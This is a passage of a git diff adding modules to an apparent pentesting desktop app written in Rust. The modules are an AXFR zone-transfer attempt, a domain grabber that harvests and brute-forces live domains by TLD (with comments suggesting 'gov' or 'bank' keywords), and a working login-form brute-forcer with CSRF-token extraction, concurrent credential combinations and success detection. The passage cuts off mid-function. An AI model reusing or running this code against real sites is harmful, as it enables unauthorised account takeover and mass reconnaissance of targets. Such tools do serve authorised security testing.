+            Some(AxfrResult { success: false, nameserver: String::new(), records_dumped: vec![], error: Some("no NS records to attempt AXFR".into()) })
+        } else {
+            Some(try_axfr(&req.domain, &ns).await)
+        }
+    } else {
+        None
+    };
+
+    Ok(DnsReport { domain: req.domain, records, axfr, dnssec, errors })
+}
diff --git a/src-tauri/src/modules/domain_grabber.rs b/src-tauri/src/modules/domain_grabber.rs
new file mode 100644
index 0000000..4a0cade
--- /dev/null
+++ b/src-tauri/src/modules/domain_grabber.rs
@@ -0,0 +1,576 @@
+// ===================================================================
+// Domain Grabber — mass-harvest real domains by TLD extension.
+//
+// Sources (researched for reliability, free, no API key):
+//   - crt.sh           — cert transparency (needs keyword for bulk)
+//   - commoncrawl      — CDX index over billions of crawled URLs
+//   - rapiddns         — 3B+ DNS records, HTML-scrape endpoint
+//   - hackertarget     — 50/day/IP hostsearch
+//   - certspotter      — CT issuances (keyword required)
+//   - wordlist-id      — 4k Indonesian common words + DNS resolve (bundled)
+//   - wordlist-id-full — 18k KBBI dictionary + DNS resolve (bundled)
+//
+// IANA catalog integration: fetch iana.org/domains/root/db → 1500+ TLDs.
+// ===================================================================
+
+use std::collections::HashSet;
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use hickory_resolver::config::{ResolverConfig, ResolverOpts};
+use hickory_resolver::TokioAsyncResolver;
+use once_cell::sync::Lazy;
+use regex::Regex;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+
+// ------------------------------------------------------------------
+// Bundled Indonesian wordlists (embedded at compile time)
+// ------------------------------------------------------------------
+
+const WORDLIST_ID_KOMPAS: &str = include_str!("../../wordlists/id-kompas.lst");
+const WORDLIST_ID_KBBI: &str   = include_str!("../../wordlists/id-kbbi.lst");
+const WORDLIST_EN_COMMON: &str = include_str!("../../wordlists/en-common.lst");
+const WORDLIST_SUBS: &str      = include_str!("../../wordlists/subs-top5k.lst");
+
+fn parse_wordlist(raw: &str) -> Vec<String> {
+    raw.lines()
+        .map(|l| l.trim().to_lowercase())
+        .filter(|l| !l.is_empty() && !l.starts_with('#'))
+        // only DNS-valid labels: a-z 0-9 - (no spaces, no unicode)
+        .filter(|l| l.chars().all(|c| c.is_ascii_alphanumeric() || c == '-'))
+        .filter(|l| !l.starts_with('-') && !l.ends_with('-') && l.len() >= 2 && l.len() <= 63)
+        .collect()
+}
+
+static WL_KOMPAS: Lazy<Vec<String>>    = Lazy::new(|| parse_wordlist(WORDLIST_ID_KOMPAS));
+static WL_KBBI: Lazy<Vec<String>>      = Lazy::new(|| parse_wordlist(WORDLIST_ID_KBBI));
+static WL_EN_COMMON: Lazy<Vec<String>> = Lazy::new(|| parse_wordlist(WORDLIST_EN_COMMON));
+static WL_SUBS: Lazy<Vec<String>>      = Lazy::new(|| parse_wordlist(WORDLIST_SUBS));
+
+#[tauri::command]
+pub fn wordlist_info() -> serde_json::Value {
+    serde_json::json!({
+        "id-kompas":  { "name": "Indonesian common (Kompas corpus)", "count": WL_KOMPAS.len() },
+        "id-kbbi":    { "name": "Indonesian KBBI dictionary",        "count": WL_KBBI.len() },
+        "en-common":  { "name": "English common words",              "count": WL_EN_COMMON.len() },
+        "subs-top5k": { "name": "Top 5k subdomain prefixes",         "count": WL_SUBS.len() },
+    })
+}
+
+// ------------------------------------------------------------------
+// IANA TLD list
+// ------------------------------------------------------------------
+
+#[derive(Debug, Clone, Serialize)]
+pub struct IanaTld {
+    pub tld: String,         // e.g. ".com"
+    pub kind: String,        // generic / country-code / sponsored / generic-restricted / infrastructure
+    pub sponsor: String,     // registry manager
+}
+
+#[tauri::command]
+pub async fn iana_tld_list() -> Result<Vec<IanaTld>, String> {
+    let client = reqwest::Client::builder()
+        .timeout(Duration::from_secs(25))
+        .user_agent("Mozilla/5.0 (PocketPentester-DomainGrabber)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    let html = client
+        .get("https://www.iana.org/domains/root/db")
+        .send().await.map_err(|e| e.to_string())?
+        .error_for_status().map_err(|e| e.to_string())?
+        .text().await.map_err(|e| e.to_string())?;
+
+    let row_re = Regex::new(r"(?s)<tr>(.*?)</tr>").unwrap();
+    let td_re = Regex::new(r"(?s)<td[^>]*>(.*?)</td>").unwrap();
+    let tag_re = Regex::new(r"<[^>]+>").unwrap();
+    let ws_re = Regex::new(r"\s+").unwrap();
+
+    let mut out: Vec<IanaTld> = Vec::new();
+    for row in row_re.captures_iter(&html) {
+        let row_html = &row[1];
+        let cells: Vec<String> = td_re.captures_iter(row_html)
+            .map(|c| {
+                let plain = tag_re.replace_all(&c[1], "");
+                ws_re.replace_all(plain.trim(), " ").to_string()
+            })
+            .collect();
+        if cells.len() != 3 { continue; }
+        let tld_raw = cells[0].trim().to_string();
+        // skip header rows, empties, and non-TLD entries
+        if !tld_raw.starts_with('.') || tld_raw.len() < 2 { continue; }
+        out.push(IanaTld {
+            tld: tld_raw.to_lowercase(),
+            kind: cells[1].clone(),
+            sponsor: cells[2].clone(),
+        });
+    }
+
+    out.sort_by(|a, b| a.tld.cmp(&b.tld));
+    Ok(out)
+}
+
+// ------------------------------------------------------------------
+// Domain grabbing
+// ------------------------------------------------------------------
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct GrabRequest {
+    pub tld: String,                  // ".id" / "id" / "co.id" / "gov.uk"
+    #[serde(default)]
+    pub keyword: Option<String>,      // optional narrowing string
+    #[serde(default = "default_sources")]
+    pub sources: Vec<String>,         // "crtsh" "urlscan" "wayback"
+    #[serde(default = "default_max")]
+    pub max_per_source: usize,
+    #[serde(default = "default_true")]
+    pub apex_only: bool,
+    #[serde(default = "default_timeout")]
+    pub timeout_ms: u64,
+    #[serde(default = "default_wl_conc")]
+    pub wordlist_concurrency: usize,
+}
+
+fn default_wl_conc() -> usize { 80 }
+
+fn default_sources() -> Vec<String> { vec!["crtsh".into(), "rapiddns".into(), "hackertarget".into()] }
+fn default_max() -> usize { 1000 }
+fn default_true() -> bool { true }
+fn default_timeout() -> u64 { 30_000 }
+
+#[derive(Debug, Clone, Serialize)]
+pub struct GrabHit {
+    pub domain: String,
+    pub source: String,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct SourceStat {
+    pub source: String,
+    pub count: usize,
+    pub error: Option<String>,
+    pub took_ms: u128,
+}
+
+// Known multi-label public suffixes by TLD — minimal curated list.
+// For proper support you'd use the full PSL; this handles common cases.
+static MULTI_SUFFIXES: Lazy<Vec<&'static str>> = Lazy::new(|| vec![
+    // Indonesia
+    "co.id", "ac.id", "go.id", "or.id", "mil.id", "sch.id", "net.id", "web.id", "ponpes.id", "my.id", "biz.id", "desa.id",
+    // UK
+    "co.uk", "org.uk", "ac.uk", "gov.uk", "net.uk", "ltd.uk", "plc.uk",
+    // Japan
+    "co.jp", "ac.jp", "ne.jp", "or.jp", "go.jp", "ed.jp", "lg.jp",
+    // Australia
+    "com.au", "net.au", "org.au", "edu.au", "gov.au",
+    // Generic
+    "com.br", "com.mx", "com.ar", "com.tr", "com.sg", "com.my", "com.ph", "com.vn", "com.hk", "com.tw",
+    "edu.my", "gov.my", "gov.sg",
+]);
+
+fn normalize_tld(t: &str) -> String {
+    t.trim().trim_start_matches('.').to_lowercase()
+}
+
+fn apex_of(host: &str, tld: &str) -> String {
+    let h = host.trim_end_matches('.').to_lowercase();
+    let tld = tld.trim_start_matches('.');
+    if !h.ends_with(&format!(".{}", tld)) && h != tld { return h; }
+
+    // Check multi-label suffix: if TLD itself includes a dot (e.g. co.id input) use as-is.
+    let parts: Vec<&str> = h.split('.').collect();
+    // find effective suffix
+    let mut eff_labels: usize = tld.split('.').count();
+    for suf in MULTI_SUFFIXES.iter() {
+        if h.ends_with(&format!(".{}", suf)) || h == *suf {
+            eff_labels = suf.split('.').count();
+            break;
+        }
+    }
+    // apex = last (eff_labels + 1) labels
+    let total = parts.len();
+    let take = (eff_labels + 1).min(total);
+    parts[total - take..].join(".")
+}
+
+fn host_from_url(u: &str) -> Option<String> {
+    url::Url::parse(u).ok().and_then(|p| p.host_str().map(|s| s.to_lowercase()))
+}
+
+fn clean_host(s: &str, tld: &str) -> Option<String> {
+    let h = s.trim().trim_start_matches("*.").trim_start_matches('.').to_lowercase();
+    let h = h.split_whitespace().next()?.to_string();
+    if h.is_empty() { return None; }
+    if h.contains('@') || h.contains(' ') || h.contains('/') { return None; }
+    if !h.ends_with(&format!(".{}", tld)) && h != tld { return None; }
+    Some(h)
+}
+
+const BROWSER_UA: &str = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36";
+
+async fn fetch_with_retry(
+    client: &reqwest::Client,
+    url: &str,
+    extra_headers: &[(&str, &str)],
+    attempts: u32,
+) -> anyhow::Result<String> {
+    let mut last_err: Option<String> = None;
+    for attempt in 1..=attempts {
+        let mut req = client.get(url)
+            .header("User-Agent", BROWSER_UA)
+            .header("Accept", "application/json, text/plain, */*")
+            .header("Accept-Language", "en-US,en;q=0.9")
+            .header("Accept-Encoding", "gzip, deflate");
+        for (k, v) in extra_headers { req = req.header(*k, *v); }
+        match req.send().await {
+            Ok(resp) => {
+                let status = resp.status();
+                let body = resp.text().await.unwrap_or_default();
+                if status.is_success() { return Ok(body); }
+                let snippet: String = body.chars().take(160).collect();
+                last_err = Some(format!("HTTP {status} — {}", snippet));
+                if status.as_u16() == 429 || status.is_server_error() {
+                    tokio::time::sleep(Duration::from_millis(1000 * attempt as u64)).await;
+                    continue;
+                } else {
+                    break; // 4xx other than 429 — no point retrying
+                }
+            }
+            Err(e) => {
+                last_err = Some(e.to_string());
+                tokio::time::sleep(Duration::from_millis(500 * attempt as u64)).await;
+            }
+        }
+    }
+    Err(anyhow::anyhow!(last_err.unwrap_or_else(|| "unknown".into())))
+}
+
+// ---- source: crt.sh ----
+async fn src_crtsh(
+    client: &reqwest::Client, tld: &str, keyword: Option<&str>,
+) -> anyhow::Result<Vec<String>> {
+    // crt.sh uses SQL LIKE patterns. `%` must be URL-encoded as %25.
+    let q = match keyword {
+        Some(k) if !k.is_empty() => format!("%25{}%25.{}", k, tld),
+        _ => format!("%25.{}", tld),
+    };
+    let url = format!("https://crt.sh/?q={}&output=json", q);
+    let body = fetch_with_retry(client, &url, &[("Referer", "https://crt.sh/")], 3).await?;
+    if body.trim().is_empty() {
+        anyhow::bail!("empty body (query too broad or server busy — try with a keyword)");
+    }
+    let val: serde_json::Value = serde_json::from_str(&body)
+        .map_err(|e| anyhow::anyhow!("json: {e} — got HTML maybe (body snippet: {})", body.chars().take(80).collect::<String>()))?;
+    let arr = val.as_array().map(|a| a.as_slice()).unwrap_or(&[]);
+    let mut out: Vec<String> = Vec::new();
+    for r in arr {
+        if let Some(nv) = r.get("name_value").and_then(|v| v.as_str()) {
+            for line in nv.split('\n') {
+                if let Some(h) = clean_host(line, tld) { out.push(h); }
+            }
+        }
+    }
+    Ok(out)
+}
+
+// ---- source: Common Crawl CDX (billions of crawled URLs) ----
+async fn src_commoncrawl(
+    client: &reqwest::Client, tld: &str, keyword: Option<&str>, max: usize,
+) -> anyhow::Result<Vec<String>> {
+    // 1. Fetch latest collection ID
+    let info_body = fetch_with_retry(client, "https://index.commoncrawl.org/collinfo.json", &[], 2).await?;
+    let info: serde_json::Value = serde_json::from_str(&info_body)
+        .map_err(|e| anyhow::anyhow!("collinfo json: {e}"))?;
+    let collection_id = info.as_array()
+        .and_then(|a| a.first())
+        .and_then(|c| c.get("id"))
+        .and_then(|v| v.as_str())
+        .ok_or_else(|| anyhow::anyhow!("no CC collection found"))?;
+
+    // 2. Query CDX index for URLs matching *.{tld}
+    let url_pat = match keyword {
+        Some(k) if !k.is_empty() => format!("*{k}*.{tld}"),
+        _ => format!("*.{tld}"),
+    };
+    let lim = max.min(5_000).to_string();
+    let cdx_url = format!("https://index.commoncrawl.org/{}-index", collection_id);
+    let url_obj = reqwest::Url::parse_with_params(
+        &cdx_url,
+        &[
+            ("url", url_pat.as_str()),
+            ("output", "json"),
+            ("fl", "url"),
+            ("limit", lim.as_str()),
+        ],
+    ).map_err(|e| anyhow::anyhow!("url build: {e}"))?;
+    let body = fetch_with_retry(client, url_obj.as_str(), &[], 2).await?;
+    if body.trim().is_empty() { return Ok(vec![]); }
+
+    // NDJSON response (one JSON obj per line)
+    let mut out = Vec::new();
+    for line in body.lines() {
+        if line.trim().is_empty() { continue; }
+        if let Ok(val) = serde_json::from_str::<serde_json::Value>(line) {
+            if let Some(u) = val.get("url").and_then(|v| v.as_str()) {
+                if let Some(h) = host_from_url(u) {
+                    if let Some(cleaned) = clean_host(&h, tld) { out.push(cleaned); }
+                }
+            }
+        }
+    }
+    Ok(out)
+}
+
+// ---- source: rapiddns.io (3B+ DNS records, HTML scrape) ----
+async fn src_rapiddns(
+    client: &reqwest::Client, tld: &str, keyword: Option<&str>,
+) -> anyhow::Result<Vec<String>> {
+    // rapiddns supports: /subdomain/DOMAIN (needs full domain) or /s/KEYWORD?full=1
+    let url = match keyword {
+        Some(k) if !k.is_empty() => {
+            // keyword-based search returns domains matching a substring
+            format!("https://rapiddns.io/s/{}.{}?full=1", k, tld)
+        }
+        _ => format!("https://rapiddns.io/s/{}?full=1", tld),
+    };
+    let html = fetch_with_retry(client, &url, &[
+        ("Referer", "https://rapiddns.io/"),
+    ], 2).await?;
+
+    // parse HTML table rows: <td>domain.tld</td>
+    let re = Regex::new(r#"<td[^>]*>([a-zA-Z0-9_.\-]+\.[a-zA-Z]{2,})</td>"#)?;
+    let mut out = Vec::new();
+    for cap in re.captures_iter(&html) {
+        if let Some(m) = cap.get(1) {
+            if let Some(h) = clean_host(m.as_str(), tld) { out.push(h); }
+        }
+    }
+    Ok(out)
+}
+
+// ---- source: hackertarget (50 queries/day per IP, no key) ----
+async fn src_hackertarget(
+    client: &reqwest::Client, tld: &str, keyword: Option<&str>,
+) -> anyhow::Result<Vec<String>> {
+    let domain = match keyword {
+        Some(k) if !k.is_empty() => format!("{k}.{tld}"),
+        _ => anyhow::bail!("hackertarget needs a keyword (e.g. 'gov' + 'id' → 'gov.id'); TLD-only not supported"),
+    };
+    let url = format!("https://api.hackertarget.com/hostsearch/?q={}", domain);
+    let body = fetch_with_retry(client, &url, &[], 2).await?;
+    if body.contains("API count exceeded") || body.contains("error check your search") {
+        anyhow::bail!("rate limited (50/day/IP exhausted)");
+    }
+    let mut out = Vec::new();
+    for line in body.lines() {
+        if let Some((host, _)) = line.split_once(',') {
+            if let Some(h) = clean_host(host, tld) { out.push(h); }
+        }
+    }
+    Ok(out)
+}
+
+// ---- source: wordlist DNS brute + HTTP alive check ----
+//
+// For each word generates multiple candidate patterns, then two-stage verify:
+//   1. DNS resolve (fast-fail if NXDOMAIN)
+//   2. HTTP GET https:// or http:// — must respond with status 200-599
+//      (treating ANY HTTP response as alive proof, even 4xx/5xx)
+//
+// Kills false positives from parking pages / wildcard DNS domains that
+// resolve but serve nothing.
+async fn src_wordlist(
+    tld: &str, keyword: Option<&str>, words: &[String], concurrency: usize,
+    app: &AppHandle, source_name: &str,
+) -> anyhow::Result<Vec<String>> {
+    // --- stage 0: build unique candidate set ---
+    let mut cand_set: HashSet<String> = HashSet::new();
+    for w in words {
+        let w = w.trim();
+        if w.is_empty() { continue; }
+        match keyword {
+            Some(k) if !k.is_empty() => {
+                cand_set.insert(format!("{w}.{k}.{tld}"));
+                cand_set.insert(format!("www.{w}.{k}.{tld}"));
+                cand_set.insert(format!("{w}-{k}.{tld}"));
+                cand_set.insert(format!("{k}-{w}.{tld}"));
+            }
+            _ => {
+                cand_set.insert(format!("{w}.{tld}"));
+                cand_set.insert(format!("www.{w}.{tld}"));
+            }
+        }
+    }
+    let candidates: Vec<String> = cand_set.into_iter().collect();
+    let total = candidates.len();
+    let _ = app.emit("grab:status",
+        format!("[{source_name}] {total} patterns to brute (dns + http check)"));
+
+    // --- shared resolver + http client ---
+    let mut opts = ResolverOpts::default();
+    opts.timeout = Duration::from_millis(1500);
+    opts.attempts = 1;
+    let resolver = Arc::new(TokioAsyncResolver::tokio(ResolverConfig::cloudflare(), opts));
+
+    let http = Arc::new(
+        reqwest::Client::builder()
+            .danger_accept_invalid_certs(true)
+            .timeout(Duration::from_millis(2500))
+            .redirect(reqwest::redirect::Policy::none())
+            .user_agent("Mozilla/5.0 (PocketPentester-DomainGrabber)")
+            .build()
+            .map_err(|e| anyhow::anyhow!("http client: {e}"))?,
+    );
+
+    let sem = Arc::new(Semaphore::new(concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+    let src_name = source_name.to_string();
+
+    let resolved: Vec<String> = stream::iter(candidates.into_iter())
+        .map(|host| {
+            let resolver = resolver.clone();
+            let http = http.clone();
+            let sem = sem.clone();
+            let done = done.clone();
+            let app = app.clone();
+            let src_name = src_name.clone();
+            async move {
+                let _permit = sem.acquire().await.unwrap();
+
+                // stage 1: DNS — fast fail
+                let dns_ok = resolver.lookup_ip(host.as_str()).await.is_ok();
+                let host_out = if dns_ok {
+                    // stage 2: HTTP alive — try https then http
+                    let mut alive = false;
+                    for scheme in ["https", "http"] {
+                        let url = format!("{scheme}://{host}");
+                        if let Ok(resp) = http.get(&url).send().await {
+                            let s = resp.status().as_u16();
+                            if (200..600).contains(&s) { alive = true; break; }
+                        }
+                    }
+                    if alive { Some(host) } else { None }
+                } else { None };
+
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                if n % 100 == 0 || n == total {
+                    let _ = app.emit("grab:wl-progress",
+                        serde_json::json!({ "source": src_name, "done": n, "total": total }));
+                }
+                host_out
+            }
+        })
+        .buffer_unordered(concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    Ok(resolved)
+}
+
+// ---- source: certspotter (fallback — CT log, very reliable) ----
+async fn src_certspotter(
+    client: &reqwest::Client, tld: &str, keyword: Option<&str>,
+) -> anyhow::Result<Vec<String>> {
+    // certspotter doesn't support TLD wildcard natively, but we can query a
+    // well-known keyword+TLD (e.g. "gov.id") to pull all matching certs.
+    let domain = match keyword {
+        Some(k) if !k.is_empty() => format!("{k}.{tld}"),
+        _ => anyhow::bail!("certspotter needs a keyword (e.g. gov, bank) — tld-only not supported"),
+    };
+    let url = format!("https://api.certspotter.com/v1/issuances?domain={}&include_subdomains=true&expand=dns_names", domain);
+    let body = fetch_with_retry(client, &url, &[], 2).await?;
+    let val: serde_json::Value = serde_json::from_str(&body)?;
+    let arr = val.as_array().map(|a| a.as_slice()).unwrap_or(&[]);
+    let mut out = Vec::new();
+    for r in arr {
+        if let Some(names) = r.get("dns_names").and_then(|v| v.as_array()) {
+            for n in names {
+                if let Some(s) = n.as_str() {
+                    if let Some(h) = clean_host(s, tld) { out.push(h); }
+                }
+            }
+        }
+    }
+    Ok(out)
+}
+
+// ------------------------------------------------------------------
+// Orchestrator
+// ------------------------------------------------------------------
+
+#[tauri::command]
+pub async fn domain_grab(app: AppHandle, req: GrabRequest) -> Result<Vec<GrabHit>, String> {
+    let tld = normalize_tld(&req.tld);
+    if tld.is_empty() { return Err("empty tld".into()); }
+    let client = reqwest::Client::builder()
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .user_agent("Mozilla/5.0 (PocketPentester-DomainGrabber)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    let _ = app.emit("grab:status",
+        format!("grabbing .{tld}{} from {} source(s)",
+            req.keyword.as_deref().map(|k| format!(" /keyword={k}")).unwrap_or_default(),
+            req.sources.len()));
+
+    let seen: Arc<tokio::sync::Mutex<HashSet<String>>> = Arc::new(tokio::sync::Mutex::new(HashSet::new()));
+    let mut all: Vec<GrabHit> = Vec::new();
+
+    let results = futures::future::join_all(req.sources.iter().map(|name| {
+        let client = client.clone();
+        let tld = tld.clone();
+        let keyword = req.keyword.clone();
+        let name = name.clone();
+        let app = app.clone();
+        let max = req.max_per_source;
+        let wl_conc = req.wordlist_concurrency;
+        async move {
+            let started = std::time::Instant::now();
+            let res = match name.as_str() {
+                "crtsh"             => src_crtsh(&client, &tld, keyword.as_deref()).await,
+                "commoncrawl"       => src_commoncrawl(&client, &tld, keyword.as_deref(), max).await,
+                "rapiddns"          => src_rapiddns(&client, &tld, keyword.as_deref()).await,
+                "hackertarget"      => src_hackertarget(&client, &tld, keyword.as_deref()).await,
+                "certspotter"       => src_certspotter(&client, &tld, keyword.as_deref()).await,
+                "wordlist-id"       => src_wordlist(&tld, keyword.as_deref(), &WL_KOMPAS,    wl_conc, &app, &name).await,
+                "wordlist-id-full"  => src_wordlist(&tld, keyword.as_deref(), &WL_KBBI,      wl_conc, &app, &name).await,
+                "wordlist-en"       => src_wordlist(&tld, keyword.as_deref(), &WL_EN_COMMON, wl_conc, &app, &name).await,
+                "wordlist-subs"     => src_wordlist(&tld, keyword.as_deref(), &WL_SUBS,      wl_conc, &app, &name).await,
+                other               => Err(anyhow::anyhow!("unknown source: {other}")),
+            };
+            let took = started.elapsed().as_millis();
+            let stat = match &res {
+                Ok(list) => SourceStat { source: name.clone(), count: list.len(), error: None, took_ms: took },
+                Err(e) => SourceStat { source: name.clone(), count: 0, error: Some(e.to_string()), took_ms: took },
+            };
+            let _ = app.emit("grab:source", stat);
+            (name, res)
+        }
+    })).await;
+
+    for (name, res) in results {
+        if let Ok(list) = res {
+            let mut added = 0usize;
+            for host in list.into_iter().take(req.max_per_source * 4) {
+                let key = if req.apex_only { apex_of(&host, &tld) } else { host.clone() };
+                let mut guard = seen.lock().await;
+                if guard.insert(key.clone()) {
+                    drop(guard);
+                    let hit = GrabHit { domain: key, source: name.clone() };
+                    let _ = app.emit("grab:hit", hit.clone());
+                    all.push(hit);
+                    added += 1;
+                    if added >= req.max_per_source { break; }
+                }
+            }
+        }
+    }
+
+    let _ = app.emit("grab:done", all.len());
+    Ok(all)
+}
diff --git a/src-tauri/src/modules/form_brute.rs b/src-tauri/src/modules/form_brute.rs
new file mode 100644
index 0000000..d7f6907
--- /dev/null
+++ b/src-tauri/src/modules/form_brute.rs
@@ -0,0 +1,335 @@
+// ===================================================================
+// Form Bruter — POST/GET login bruteforce with regex success/fail detection.
+//
+// Body template supports {USER} and {PASS} placeholders.
+// Also supports {CSRF} — auto-extracted from a "priming" GET request.
+//
+// Success detection (in order, first matching rule wins):
+//   1. success_regex  — regex matching response body
+//   2. fail_regex     — regex matching response body (miss = hit)
+//   3. success_status — status code matches (e.g. 302)
+//   4. content-length delta threshold
+// ===================================================================
+
+use std::collections::HashMap;
+use std::sync::Arc;
+use std::time::{Duration, Instant};
+
+use futures::stream::{self, StreamExt};
+use regex::Regex;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct FormBruteRequest {
+    pub url: String,
+    #[serde(default = "default_method")]
+    pub method: String,
+    /// Body template (or query if method=GET). Ex: `user={USER}&pass={PASS}`
+    pub body_template: String,
+    #[serde(default)]
+    pub headers: HashMap<String, String>,
+
+    pub users: Vec<String>,
+    pub passwords: Vec<String>,
+
+    /// Attack mode: "clusterbomb" (cart. product, default) or "pitchfork" (lockstep pairs).
+    #[serde(default = "default_mode")]
+    pub mode: String,
+
+    /// Prime URL — optional GET first to pick up cookies / CSRF token.
+    #[serde(default)]
+    pub prime_url: Option<String>,
+    /// Regex to extract CSRF token from priming response. Use capture group 1.
+    #[serde(default)]
+    pub csrf_regex: Option<String>,
+    #[allow(dead_code)]
+    #[serde(default = "default_csrf_field")]
+    pub csrf_field: String, // placeholder name in body template, default {CSRF}
+
+    /// Success / failure detection (any match hits).
+    #[serde(default)]
+    pub success_regex: Option<String>,
+    #[serde(default)]
+    pub fail_regex: Option<String>,
+    #[serde(default)]
+    pub success_status: Option<Vec<u16>>,
+    /// If set, any response with body length outside baseline ± this delta is treated as success.
+    #[serde(default)]
+    pub size_delta_threshold: Option<i64>,
+
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+    #[serde(default)]
+    pub follow_redirects: bool,
+    #[serde(default)]
+    pub stop_on_first: bool,
+}
+
+fn default_method() -> String { "POST".into() }
+fn default_mode() -> String { "clusterbomb".into() }
+fn default_csrf_field() -> String { "{CSRF}".into() }
+
+#[derive(Debug, Clone, Serialize)]
+pub struct FormBruteHit {
+    pub user: String,
+    pub pass: String,
+    pub status: u16,
+    pub size: u64,
+    pub redirect: Option<String>,
+    pub reason: String,
+    pub time_ms: u128,
+}
+
+fn urlencode(s: &str) -> String {
+    use std::fmt::Write;
+    let mut out = String::new();
+    for b in s.as_bytes() {
+        match *b {
+            b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'-' | b'_' | b'.' | b'~' => out.push(*b as char),
+            _ => { let _ = write!(out, "%{:02X}", b); }
+        }
+    }
+    out
+}
+
+fn substitute(template: &str, user: &str, pass: &str, csrf: &str) -> String {
+    template
+        .replace("{USER}", &urlencode(user))
+        .replace("{PASS}", &urlencode(pass))
+        .replace("{CSRF}", &urlencode(csrf))
+        .replace("{USER_RAW}", user)
+        .replace("{PASS_RAW}", pass)
+}
+
+#[tauri::command]
+pub async fn form_brute_run(app: AppHandle, req: FormBruteRequest) -> Result<Vec<FormBruteHit>, String> {
+    let client = reqwest::ClientBuilder::new()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .redirect(if req.follow_redirects {
+            reqwest::redirect::Policy::limited(5)
+        } else {
+            reqwest::redirect::Policy::none()
+        })
+        .cookie_store(true)
+        .user_agent("Mozilla/5.0 (PocketPentester-FormBrute)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    // ---- priming: GET + CSRF extraction ----
+    let mut csrf_val = String::new();
+    if let Some(pu) = &req.prime_url {
+        let _ = app.emit("brute:status", format!("priming {pu}"));
+        match client.get(pu).send().await {
+            Ok(resp) => {
+                let body = resp.text().await.unwrap_or_default();
+                if let Some(pattern) = &req.csrf_regex {
+                    if let Ok(re) = Regex::new(pattern) {
+                        if let Some(cap) = re.captures(&body) {
+                            if let Some(m) = cap.get(1).or_else(|| cap.get(0)) {
+                                csrf_val = m.as_str().to_string();
+                                let _ = app.emit("brute:status", format!("csrf token extracted ({} chars)", csrf_val.len()));
+                            }
+                        }
+                    }
+                }
+                if csrf_val.is_empty() && req.csrf_regex.is_some() {
+                    let _ = app.emit("brute:status", "csrf regex did not match priming response");
+                }
+            }
+            Err(e) => { let _ = app.emit("brute:status", format!("prime failed: {e}")); }
+        }
+    }
+
+    // ---- baseline: 1 request with dummy creds to learn the "failure" size ----
+    let baseline_body = substitute(&req.body_template, "baseline_xxxxxxxx", "baseline_yyyyyy", &csrf_val);
+    let baseline_size: Option<i64> = {
+        let mut b = client.request(
+            reqwest::Method::from_bytes(req.method.as_bytes()).unwrap_or(reqwest::Method::POST),
+            &req.url,
+        );
+        for (k, v) in &req.headers { b = b.header(k, v); }
+        if req.method.to_uppercase() == "GET" {
+            b = b.query(&parse_kv(&baseline_body));
+        } else {
+            b = b.header("Content-Type", "application/x-www-form-urlencoded").body(baseline_body);
+        }
+        match b.send().await {
+            Ok(r) => {
+                let txt = r.text().await.unwrap_or_default();
+                Some(txt.len() as i64)
+            }
+            Err(_) => None,
+        }
+    };
+    if let Some(bs) = baseline_size {
+        let _ = app.emit("brute:status", format!("baseline fail response: {bs} bytes"));
+    }
+
+    // ---- build pairs ----
+    let pairs: Vec<(String, String)> = match req.mode.as_str() {
+        "pitchfork" => {
+            let n = req.users.len().min(req.passwords.len());
+            (0..n).map(|i| (req.users[i].clone(), req.passwords[i].clone())).collect()
+        }
+        _ => {
+            let mut out = Vec::with_capacity(req.users.len() * req.passwords.len());
+            for u in &req.users {
+                for p in &req.passwords {
+                    out.push((u.clone(), p.clone()));
+                }
+            }
+            out
+        }
+    };
+
+    let total = pairs.len();
+    let _ = app.emit("brute:status", format!("attempting {total} combinations ({})", req.mode));
+
+    // ---- compile regexes once ----
+    let succ_re = req.success_regex.as_ref().and_then(|p| Regex::new(p).ok());
+    let fail_re = req.fail_regex.as_ref().and_then(|p| Regex::new(p).ok());
+    let succ_status: std::collections::HashSet<u16> = req.success_status.clone().unwrap_or_default().into_iter().collect();
+
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+    let stop = Arc::new(std::sync::atomic::AtomicBool::new(false));
+    let client = Arc::new(client);
+
+    let csrf = csrf_val;
+    let method = reqwest::Method::from_bytes(req.method.to_uppercase().as_bytes())
+        .map_err(|e| format!("bad method: {e}"))?;
+
+    let hits: Vec<FormBruteHit> = stream::iter(pairs.into_iter())
+        .map(|(user, pass)| {
+            let client = client.clone();
+            let sem = sem.clone();
+            let done = done.clone();
+            let stop = stop.clone();
+            let app = app.clone();
+            let url = req.url.clone();
+            let headers = req.headers.clone();
+            let template = req.body_template.clone();
+            let method = method.clone();
+            let succ_re = succ_re.clone();
+            let fail_re = fail_re.clone();
+            let succ_status = succ_status.clone();
+            let size_delta = req.size_delta_threshold;
+            let csrf = csrf.clone();
+            let stop_first = req.stop_on_first;
+            async move {
+                if stop.load(std::sync::atomic::Ordering::Relaxed) { return None; }
+                let _permit = sem.acquire().await.unwrap();
+                if stop.load(std::sync::atomic::Ordering::Relaxed) { return None; }
+
+                let body = substitute(&template, &user, &pass, &csrf);
+                let start = Instant::now();
+
+                let mut builder = client.request(method.clone(), &url);
+                for (k, v) in &headers { builder = builder.header(k, v); }
+                if method == reqwest::Method::GET {
+                    builder = builder.query(&parse_kv(&body));
+                } else {
+                    builder = builder.header("Content-Type", "application/x-www-form-urlencoded").body(body);
+                }
+
